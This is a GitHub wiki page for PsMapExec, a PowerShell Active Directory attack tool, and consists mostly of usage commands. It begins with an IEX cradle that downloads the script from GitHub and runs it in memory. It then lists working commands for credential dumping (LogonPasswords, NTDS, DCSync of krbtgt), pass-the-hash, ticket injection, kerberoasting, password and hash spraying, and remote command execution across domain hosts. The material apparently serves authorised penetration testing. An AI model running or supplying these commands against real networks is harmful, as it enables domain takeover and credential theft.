Skip to content

Home

Jump to bottom
The-Viper-One edited this page Jun 4, 2025 · 11 revisions

Welcome

Welcome to the PsMapExec Wiki. The purpose of the Wiki is to give insturction on how to fully utilize PsMapExec to dominate Active Directory.

🚨 Please see the sidebar to the right. It is highly recommended to read through the pages in order. 🚨

TL;DR

Load the script directly into memory

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Example Commands

Below are some command examples which can be used. Generally, most methods can be mixed with different targets and credential material to do various things.

# SMB
PsMapExec SMB -Targets "ALL" -Username "user" -Password "Pass" -Command "ipconfig" -Domain "security.local"
PsMapExec SMB -Targets "Workstations" -Username "user" -Password "Pass" -Module "LogonPasswords" -ShowOutput
PsMapExec SMB -Targets "DC01.Security.local" -Username "user" -Hash "8846F7EAEE8..." -Module "KerbDump" -ShowOutput
PsMapExec SMB -Targets "10.10.10.0/24" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." 

# WMI
PsMapExec WMI -Targets "Servers" -Username "user" -Password "Pass" -Command "ipconfig"
PsMapExec WMI -Targets "Servers" -Username "administrator" -Password "Pass" -Module "SCCM" -LocalAuth
PsMapExec WMI -Targets "WKSTN0*" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Domain "security.local"

# WinRM
PsMapExec WinRM -Targets "ALL" -Username "user" -Password "Pass" -Command "ipconfig"
PsMapExec WinRM -Targets "C:\scope.txt" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Domain "security.local"
PsMapExec WinRM -Targets "DC01.Security.local" -Username "user" -Hash "8846F7EAEE8..." -Module "NTDS" -ShowOutput

# LDAP/S
PsMapExec LDAP -Targets "DCs" -Username "user" -Password "Pass"
PsMapExec LDAP -Targets "DC1" -Username "user" -Password "Pass" -module "whoami"
PsMapExec LDAP -Targets "DC1" -Ticket "doIFmjCCBZagAwIBBaEDAgEWooIE..." -Module "AddComputer" -Domain "security.local"
PsMapExec LDAP -Targets "DC1" -Username "user" -Password "Pass" -Module Elevate -TargetDN "CN=Mendez,CN=Users,DC=SECURITY,DC=LOCAL"
PsMapExec LDAP -Targets "DC1" -Username "user" -Hash "8846F7EAEE8..." -Module "timeroast" -ShowOutput

# Kerberoast stuff
PsMapExec kerberoast -Domain "dev.security.local" -ShowOutput 
PsMapExec kerberoast -Domain "dev.security.local" -Option "Kerberoast:dev_user_1" -ShowOutput

# RDP
PsMapExec RDP -Targets "Servers" -Username "user" -Password "password"
PsMapExec RDP -Targets "Servers" -Username "user" -Password "password" -Domain "dev.security.local" -LocalAuth

# DCSync 
PsMapExec DCSync -Targets "DC1.security.local" -ShowOutput -Domain "security.local"
PsMapExec DCSync -Targets "DC1.security.local" -option "dcsync:security\krbtgt" -ShowOutput

# SMB Signing
PsMapExec GenRelayList -Targets "All" -Domain "Security.local"
PsMapExec GenRelayList -Targets "Servers" -Domain "Security.local"

# Inject Kerberos tickets into current session
PsMapExec Inject -Ticket "doIhsj..."
PsMapExec Inject -Ticket "C:\ticket.txt"
PsMapExec Inject -Username "user" -Hash "8846F7EAEE8..." -Domain "security.local"
PsMapExec Inject -Username "user" -Password "password" -Domain "security.local"

# IPMI hashes
PsMapExec IPMI -Targets "Servers" -Domain "security.local"
PsMapExec IPMI -Targets "All" -Option "IPMI:bob_admin"

# MSSQL
PsMapExec MSSQL -Targets "All" -Username "SA" -Password "Password123" -LocalAuth
PsMapExec MSSQL -Targets "All" -Command "whoami" -Domain "security.local"

# Spray credentials
PsMapExec Spray -SprayPassword "password" 
PsMapExec Spray -AccountAsPassword -Domain "dev.security.local"
PsMapExec Spray -EmptyPassword -Domain "security.local"
PsMapExec Spray -Pre2k
PsMapExec Spray -SprayHash [RC4]
PsMapExec Spray -SprayHash [AES256]
PsMapExec Spray -SprayHash [LM:NT]

# Check for VNC no auth
PsMapExec VNC -Target "All" -Domain "Security.local"

Targets Acquisition

Target acquisition through PsMapExec is utilized through ADSI Searcher. As long as you are operating from a domain joined system as a domain user account, no issues should be encountered when acquiring targets. By default only enabled Active Directory computer accounts are populated into the target list. PsMapExec will set the Domain to the current user domain unless -Domain is specified. IP address targeting is less preffered than using the built in ldap queries.

# All workstations, servers and domain controllers within the domain
PsMapExec [Method] -Targets All

# All workstations, servers and domain controllers on the specified domain
PsMapExec [Method] -Targets All -Domain [Domain]

# Only servers from the domain (exluding DCs)
PsMapExec [Method] -Targets Servers

# Only Domain Controllers from the domain
PsMapExec [Method] -Targets DCs

# Only workstations from the domain
PsMapExec [Method] -Targets Workstations

# Set the target values to a defined computer name
PsMapExec [Method] -Targets DC01.Security.local

# Read targets from file
PsMapExec [Method] -Targets "C:\Targets.txt"

# Wildcard filtering
PsMapExec [Method] -Targets SRV*

# Single IP Address
PsMapExec [Method] -Targets 192.168.56.11

# CIDR Range
PsMapExec [Method] -Targets 192.168.56.0/24

Authentication Types

When -Command and -Module are omitted, PsMapExec will simply check the provided or current user credentials against the specified target systems for administrative access over the specified method.

# Current user
PsMapExec [Method] -Targets All

# With Password
PsMapExec [Method] -Targets All -Username [Username] -Password [Password]

# With Hash
PsMapExec [Method] -Targets All -Username [Username] -Hash [RC4/AES256/NTLM]

# With Ticket
PsMapExec [Method] -Targets All -Ticket [doI.. OR Path to ticket file]

# Local Authentication (WMI only)
PsMapExec WMI -Targets All -LocalAuth -Username [Username] -Password [Password]

Command Execution

All currently supported command execution methods support the -Command parameter. The command parameter can be appended to the above Authentication Types to execute given commands as a specified or the current user.

PsMapExec [Method] -Targets All -Command [Command]

Module Execution

All currently supported command execution methods support the -Module parameter. The module parameter can be appended to the Authentication Types to execute given modules as a specified or the current user.

PsMapExec [Method] -Targets All -Module [Module]
Clone this wiki locally